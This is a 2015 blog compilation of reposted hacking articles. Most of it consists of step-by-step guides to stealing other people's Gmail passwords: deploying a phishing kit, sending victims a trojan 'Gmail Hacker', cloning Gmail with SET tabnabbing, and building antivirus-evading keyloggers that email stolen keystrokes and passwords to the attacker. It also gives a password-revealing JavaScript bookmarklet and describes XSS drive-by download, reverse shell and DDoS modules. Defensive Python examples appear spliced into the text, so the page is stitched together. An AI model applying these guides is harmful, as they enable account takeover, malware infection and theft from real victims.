Monday, January 26, 2015

6 Ways to Hack Gmail Password

Gmail Password Decryptor

GooglePasswordDecryptor is the FREE tool to instantly recover Google account passwords stored by various Google applications as well as popular web browsers. Most of Google’s desktop applications such as GTalk, Picasa etc. store the Google account password to spare the user the hassle of entering it every time.

http://securityxploded.com/googlepassworddecryptor.php


How to View Hidden Password behind ****

You can use this script when someone has checked the "remember me" box in the login form of any website, to reveal the saved password hidden behind the asterisks.
After opening the web page, paste the JavaScript given below in the address bar and hit Enter:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if%20(s)%20alert(%22Passwords%20in%20forms%20on%20this%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are%20no%20passwords%20in%20forms%20on%20this%20page.%22);})();


Web Browser Pass View

WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 9.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and Gmail, as long as the password is stored by your Web Browser.

http://www.nirsoft.net/utils/web_browser_password.html

How to Hack Gmail Account (Phishing)

First of all download the Gmail Phisher.
http://goo.gl/SfpEq
Extract the rar file; you will get the three files listed below:
index.html
log.txt
login.php
Upload all three files to any free web hosting server. Some free web hosting servers are listed below; you can also find a few more for yourself.
http://www.yourfreehosting.net/
http://www.esmartstart.com/
http://www.110mb.com/
http://www.drivehq.com/
http://www.t35.com/


Once you have uploaded all three files to the web hosting server, you have to send these to your victim.
After sending the Phisher to the victim, once the user logs in to his Gmail account using your Phisher, his user ID and password are ours… These are stored in log.txt; all you have to do is refresh your web hosting account files.


How to Hack Gmail Password Using Gmail Hacker

First Download Gmail Hacker from http://goo.gl/oQNgd

  • Enter your email ID and your password and select the Build option.
  • Now send the Gmail Hacker file to the victim and tell him that this software is to hack Gmail passwords.
  • Ask him to fill in all the information it requires and then click on “Hack them”.

When he selects the “Hack them” option he will get an error, and you will get his email ID and password in your mail.

Hack Gmail Password Using BackTrack

First open your BackTrack terminal and type ifconfig to check your IP.

Now open your BackTrack terminal again and type cd /pentest/exploits/set
Now open the Social Engineering Toolkit (SET): ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4 “Tabnabbing Attack Method”.

In this option we will choose option 2 “Site Cloner”.

Enter the URL of the site you want to clone, in this case http://www.gmail.com, and hit Enter. SET will clone the web site. Press Return to continue.

Now convert your URL into a Google URL using goo.gl and send this link address to your victim via email or chat.

When the victim opens it in their browser, there should be a message that the page is still loading, so the victim starts to open another tab. As soon as the victim opens a new tab, our fake website starts working. That script will redirect the victim to the phishing page you derived.


Source: http://www.hackingarticles.in/6-ways-to-hack-gmail-password/

How to Gmail in a Pen Drive (Mail Stores)

You can back up all your e-mail to your PC or pen drive using Microsoft Outlook Express. You can also use MailStore, which is the best software for e-mail archiving and backup. You can download MailStore from its official website.

First download MailStore.

Click on the .exe file on your USB stick and click on Archive E-mail.
Click on Google Mail.
Enter your email address and password. You can test access to your account by clicking on the Test button.
Click on Next. Here you can configure the backup options.

Source: http://www.hackingarticles.in/how-to-gmail-in-a-pen-drive-mail-stores/

How to Hack Gmail Facebook using FUD Keylogger

First download Project Neptune Keylogger.
Open the program.
Double click on the program where you downloaded it.

First check the box that says “Use Email for Storing Logs”, then change how often the keylogger sends logs.
In the Email settings tab keep “smtp.gmail.com” and the port number 587. Where it says “Email to Send Keystroke Logs”, put your email in that box, and in the box under that put the password to your email.
If you want, you can change which email it sends the logs to, but otherwise use the same email that you put above.
Then click Test Email Account Information, and if you get an email saying that it works, you can move on to the next step.
Keep all the settings the same, unless you want to disable Task Manager or block websites. Now we will add some online virus scanning sites to block them; this means that the sites can’t scan the tool for viruses.
Go to the Installation tab and check the first box in “Startup Settings”, then choose a place to install in the Installation Directory.
In the Installation Directory I would put it in the “AppData Folder”.
Then go to Original File and check “Do Nothing with Original File after Install” to keep the suspicion level at none.
If you want file downloading enabled, type in the link of your exe or other file; if not, do nothing with this box.

Now go to the ‘Server Creation’ tab and press ‘Generate New Server’ under ‘server creation’, give your keylogger a name, and that’s it… You are done.
You have successfully created a keylogger server file. Now, simply send this file to your victim via email; once the victim runs our keylogger, we will receive key logs every 20 min via email.

Source: http://www.hackingarticles.in/gmail-facebook-keylogger/

How to Hack Gmail Account

First Download Rin Logger from Download
Run the keylogger file on your PC and click on “Create new”.

Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next

Now enable Attach Screenshots by clicking on it. Enter the duration (time in minutes) to receive email key logs. After that hit “verify now”. If you get a message saying verified, you’re good to go; click Next.

Now enable the “Install Keylogger” by clicking on it.
Name the file anything you want and select Installation path as “Application Data”, click next

Click on Next

Now, “Enable Website Viewer” by clicking on it.
Click on Next option.

Now, Enable the “Enable File Binder”.
Click on next

Now enable “Steal Password”.
Click on Next

Fill all the information by yourself. And click on next.

Now, hit on “Save As” and select the location where you want to save your keylogger server file.
And click on “Compile Server”. Now Compile has been done.

You have successfully created a keylogger server file. Now, simply send this file to your victim via email; once the victim runs our keylogger, we will receive key logs every 10 min via email.

Source: http://www.hackingarticles.in/how-to-hack-gmail-account/

300 free online courses

Link

http://wwwhatsnew.com/2015/01/25/300-cursos-universitarios-online-y-gratuitos-que-inician-en-febrero/

Network Penetration Testing using Android Phone (zANTI Tutorial Part 1)

zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.
First download from here and install the app on your Android phone.
Press Start Now and then skip the next step.

Move ahead by clicking next and then select the check box to enable penetration testing and press finish.

The next window will show you all the computers and mobiles connected to your network.
Select the desired connected victim from the list. In my case, victim ip is 192.168.0.102
You can see the available actions to scan the victim’s pc. Now click on scan button

Turn on smart scanning and proceed further

Check the scan log.

You can now see the list of open ports of the victim’s pc.

For more information about penetration testing of networks using zANTI, wait for the upcoming article of the series.
Author: Sommay Jain is a budding lawyer. He likes to discover new facts and tools. He has performed the role of a trainee, developer, programmer, cyber law expert. His interests are mainly in IT business, and management.

Source: http://www.hackingarticles.in/network-penetration-testing-using-android-phone-zanti-tutorial-part-1/

Ghiro: a forensic tool for bulk image analysis

Forensic investigators often need to process digital images as evidence. In a forensic analysis that involves many images, it is hard to handle that much information unless a tool is used to make the work easier.

Ghiro is a tool able to handle gigabytes of images, extract and organize the information, and present it in a nicely formatted report.
All tasks are fully automated: you only have to upload the images and let Ghiro do the work.

Ghiro is also a multi-user environment, in which different permissions can be assigned to each user. Each case lets you group images by topic and choose what each user can see according to the permission scheme.

Use cases

Ghiro is not only for forensic investigators who use it daily in their analysis lab; it can be used in many scenarios. Some example use cases are the following:

- If you need to extract all the data and metadata hidden in an image in a fully automated way
- If you need to analyze a large number of images and do not have much time to read the report for all of them
- If you need to search for a specific piece of metadata across a pile of images
- If you need to geolocate many images and see them on a map
- If you want to search against a list of hashes of "special" images

In any case, Ghiro is designed to be used in many other scenarios; imagination is the only limit.


Main features

- Metadata extraction: metadata is divided into several categories depending on the standard. The image metadata is extracted and classified. For example: EXIF, IPTC, XMP.

- GPS localization: the metadata of an image sometimes contains a geotag, GPS information giving the longitude and latitude of where the photo was taken. It is read and the position is shown on a map.

- MIME information: the image MIME type is detected to know what kind of image is being handled, in both simple (for example: image/jpeg) and extended form.

- Error level analysis: error level analysis (ELA) identifies areas within an image that are at different compression levels. The whole image should be at roughly the same level; if a difference is detected, a modification has probably been made.

- Thumbnail extraction: thumbnails and their related data are extracted from the image metadata and stored for review.

- Thumbnail consistency: sometimes, when a photo is edited, the original image is edited but the thumbnail is not. Ghiro detects differences between thumbnails and their corresponding images.

- Signature engine: more than 120 signatures provide evidence about the most critical data, highlighting focal points and common exposures.

- Hash matching: suppose you are looking for an image and you only have its hash. You can provide a list of hashes, and all images will be searched against that hash or those hashes.
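
The hash-matching feature described in the last item can be sketched as follows; this is an added example, not Ghiro's own code. It assumes a hash list with one hex digest per line (MD5, SHA-1 or SHA-256, told apart by length); the function names and the sample files are constructed for illustration.

```python
import hashlib
import os
import tempfile

# The digest algorithm is inferred from the hex length of each listed hash.
ALGO_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def load_hash_list(lines):
    """Parse one hex digest per line; '#' starts a comment.

    Returns ({algorithm: set_of_lowercase_digests}, rejected_lines) so the
    analyst can see which entries were ignored as malformed.
    """
    wanted, rejected = {}, []
    for raw in lines:
        entry = raw.split("#", 1)[0].strip().lower()
        if not entry:
            continue
        algo = ALGO_BY_HEX_LEN.get(len(entry))
        if algo is None or any(c not in "0123456789abcdef" for c in entry):
            rejected.append(raw.strip())
            continue
        wanted.setdefault(algo, set()).add(entry)
    return wanted, rejected


def digest_file(path, algos, chunk_size=1 << 20):
    """Read the file once, in chunks, feeding every requested algorithm."""
    hashers = {a: hashlib.new(a) for a in algos}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {a: h.hexdigest() for a, h in hashers.items()}


def find_matches(root, wanted):
    """Walk `root` and return [(path, algorithm, digest)] for every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue  # do not follow links out of the evidence tree
            for algo, value in digest_file(path, wanted.keys()).items():
                if value in wanted[algo]:
                    hits.append((path, algo, value))
    return hits


if __name__ == "__main__":
    # Constructed sample evidence: two small files standing in for images.
    with tempfile.TemporaryDirectory() as root:
        for name, data in (("a.jpg", b"constructed-a"), ("b.png", b"constructed-b")):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        listing = [hashlib.sha256(b"constructed-a").hexdigest().upper() + "  # known image",
                   "not-a-hash"]
        wanted, rejected = load_hash_list(listing)
        for path, algo, value in find_matches(root, wanted):
            print(f"{algo}:{value}  {os.path.basename(path)}")
        print("ignored:", rejected)
```

Matching on a cryptographic hash only finds byte-identical copies; a re-saved or resized image needs the metadata and thumbnail checks listed above.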

Official website: http://www.getghiro.org/

Source: http://www.hackplayers.com/2015/01/ghiro-una-herramienta-forense-para-imagenes.html

OWASP Xenotix XSS Exploit Framework v3 2013

Introduction

Cross Site Scripting or XSS vulnerabilities have been reported and exploited since the 1990s. XSS was listed third in the OWASP 2013 list of web application vulnerabilities. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows attackers to inject client-side script into web pages viewed by other users. The injected code executes on the client side. An attacker can use a cross-site scripting vulnerability to bypass the Same Origin Policy (SOP). In the past, the potential of XSS vulnerabilities was not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements, and was not considered a high-risk vulnerability. But later XSS tunneling and payload delivery showed us the potential of XSS. Most large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffer from XSS bugs. That’s a brief introduction to XSS.

Some threats due to XSS

XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.
Client side code injection: A hacker can inject malicious code and execute it at the client side.
DOS: A hacker can perform DOS against a remote server or against the client itself.
Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.
Malware Spreading: A hacker can spread malware with a website which is vulnerable to XSS.
Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.
Defacing: Temporary or permanent defacement of a web application is possible.

What is Xenotix XSS Exploit Framework?



Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. The tool can inject code into web pages that are vulnerable to XSS. It is basically a payload-list-based XSS scanner and XSS exploitation kit. It gives a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time-sharing-based test modes. The exploitation framework in the tool includes an XSS encoder, a victim-side XSS keystroke logger, an Executable Drive-by downloader, an XSS Reverse Shell and an XSS DDoSer. These exploitation tools help the penetration tester create proof-of-concept attacks on vulnerable web applications when preparing a penetration test report.

Features of Xenotix XSS Exploit Framework

Xenotix XSS Exploit Framework is divided into two modules:

  • Scanner Module
      • Built in XSS Payloads
      • HTML5 compatible Payload list
      • XSS Auto mode Scanner
      • XSS Multi-Parameter Scanner
      • XSS Fuzzer
  • Exploitation Framework
      • XSS Keylogger
      • XSS Executable Drive-by downloader
      • XSS Payload Encoder
      • XSS Reverse Shell
      • XSS DDoSer
      • XSS Cookie Thief

Scanner Module

Built in Payload List

It has an inbuilt list of 500+ XSS payloads, including HTML5 compatible XSS injection payloads. Most XSS filters are implemented using a String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.

The above chart shows the number of XSS payloads in different XSS scanning tools available on the market. Xenotix XSS Exploit Framework has the world’s second largest XSS payload list, after IBM AppScan Security, which has 700 million payloads.
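
Why the string-replace and entity filters named under Built in Payload List fall short, seen from the defender's side: this added example (not code from Xenotix or from the original article) runs two weak filters and context-appropriate output encoding through the same template, and a parser checks whether the user value added any markup. The template, the function names and the inert test strings are assumptions constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser


def strip_script_tags(value):
    """Weak: one-pass string replace. Deleting text can splice the
    characters around it into the very token that was removed."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def escape_without_single_quote(value):
    """Weak in single-quoted attributes: encodes & < > " but not '
    (the behaviour of PHP's ENT_COMPAT flag, modelled here in Python)."""
    return html.escape(value, quote=False).replace('"', "&quot;")


def encode_for_html(value):
    """Output encoding of & < > " ' for element content and quoted attributes."""
    return html.escape(value, quote=True)


def render_profile(name, encoder):
    """Hypothetical template that emits one user value in two contexts."""
    safe = encoder(name)
    return f"<p>Hello {safe}</p><input name='nick' value='{safe}'>"


class _Inventory(HTMLParser):
    """Records every start tag and its attribute names, as a parser sees them."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, tuple(sorted(k for k, _ in attrs))))


# What the template produces when the user value contributes only text.
TEMPLATE_ONLY = [("p", ()), ("input", ("name", "value"))]


def introduces_markup(rendered):
    """True if the user value added any element or attribute to the page."""
    inv = _Inventory()
    inv.feed(rendered)
    inv.close()
    return inv.seen != TEMPLATE_ONLY


# Constructed, inert test strings (not taken from any payload list).
SAMPLES = {
    "nested_tag": "<scr<script>ipt>marker()</scr</script>ipt>",
    "quote_breakout": "x' data-injected='1",
}


def evaluate(encoder):
    """Run every sample through the template with the given filter."""
    return {name: introduces_markup(render_profile(text, encoder))
            for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for enc in (strip_script_tags, escape_without_single_quote, encode_for_html):
        print(f"{enc.__name__:28} {evaluate(enc)}")
```

The encoding shown covers element content and quoted attributes only; values placed in unquoted attributes, script blocks or URLs need the encoding for that context.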

XSS Scanner Module

XSS Multi-Parameter Scanner


The Multi-Parameter XSS Scanner is useful when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of time, as you don’t need to test each parameter separately.

XSS Fuzzer


The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Pollution. With the Fuzzer, one can conduct out-of-the-box fuzzing to detect hidden vulnerabilities in a web application.

Exploitation Framework

XSS Keylogger

The tool includes an inbuilt victim-side key logger which is implemented using JavaScript and PHP. PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and sends them to a PHP file, which writes the logs to a text file.

XSS Executable Drive-by Downloader


Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into an XSS vulnerable page and serve it to your victim. When the victim views the injected page, the Java applet client.jar will access the command prompt and, with the help of the echo command, write some scripts to a Visual Basic script file named winconfig.vbs in the temp directory (%temp%), and then cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to the temp directory, rename it as update.exe and finally execute update.exe. The downloading and executing of the malicious executable happens without the knowledge and permission of the victim.

XSS Payload Encoder

The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.

XSS Reverse Shell

An XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. When the XSS vulnerable web application, exploited with the injectable scripts generated by XSS Reverse Shell, is presented to a victim, it will initiate the drive-by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by.
The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of the reverse shell, it will pop up a UAC dialog requesting permission to run the executable. The tool has an inbuilt Listener that listens for the reverse shell. It is designed in a user-friendly manner. All you have to do is specify the reverse connection IP and port.

XSS DDoSer


With HTML 5 comes great power. We harvest the power of HTML 5 to abuse Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack. WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a browser behind the scenes. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it, by abusing CORS, the add-on creates numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the ‘Access-Control-Allow-Origin’ header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.

XSS Cookie Thief


It’s the traditional Cookie Stealer but a bit more advanced and with a real-time cookie viewer. This module allows the pentester to create a cookie stealing POC.

Features for the Next Build

The current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine, Trident. Since XSS behaves slightly differently in different web browsers, support for the Gecko (used by Mozilla Firefox) and WebKit (used by Chrome, Opera, and Safari) rendering engines will be added in the next build. Support for XSS in POST parameters and XSS testing by modifying the headers will be included in the next build. An XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable to XSS and DOM Based XSS detection will be added in the next build.

Conclusion

XSS in popular websites is a high security threat. Xenotix XSS Exploit Framework can be used by security analysts to perform penetration tests on web applications against XSS vulnerabilities and to create POCs with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS scanners or XSS exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner and as an XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bounty etc. are there. So go XSS hunting and grab your bounty.

About Author

Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He has published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His areas of interest include web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.

Source: http://www.hackingarticles.in/owasp-xenotix-xss-exploit-framework-v3-2013/